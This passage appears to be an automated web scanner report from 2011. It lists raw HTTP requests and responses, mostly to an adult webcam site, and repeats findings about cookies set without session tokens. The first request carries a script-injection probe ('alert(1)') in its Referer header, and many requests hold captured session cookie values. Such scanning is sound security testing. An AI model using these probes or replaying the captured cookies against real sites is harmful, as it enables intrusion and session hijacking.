GET /servlet/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:41:43 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store Expires: Tue, 01 Jan 2000 00:00:00 GMT P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC" Content-Type: application/x-javascript Set-Cookie: i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689 Set-Cookie: ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/
document.write("<"+"!--Iframe Tag -->\n"); document.write("<"+"!-- begin ZEDO for channel: HLW on MB - CPM , publisher: MB Network , Ad Dimension: Medium Rectangle - 300 x 250 -->\n"); document.write ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GuestDiscountClubs.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /webcam-sign-up/ Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:52 GMT Connection: close Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /awardarena/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:45 GMT Connection: close Content-Length: 24651 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /becomehost.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 20899 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:17 GMT Connection: close Content-Length: 18918 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 21809 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /disclaimer.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:24 GMT Connection: close Content-Length: 78840 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:54 GMT Connection: close Content-Length: 39880 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:02 GMT Connection: close Content-Length: 25126 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:36 GMT Connection: close Content-Length: 220458 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:38 GMT Connection: close Content-Length: 27140 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; 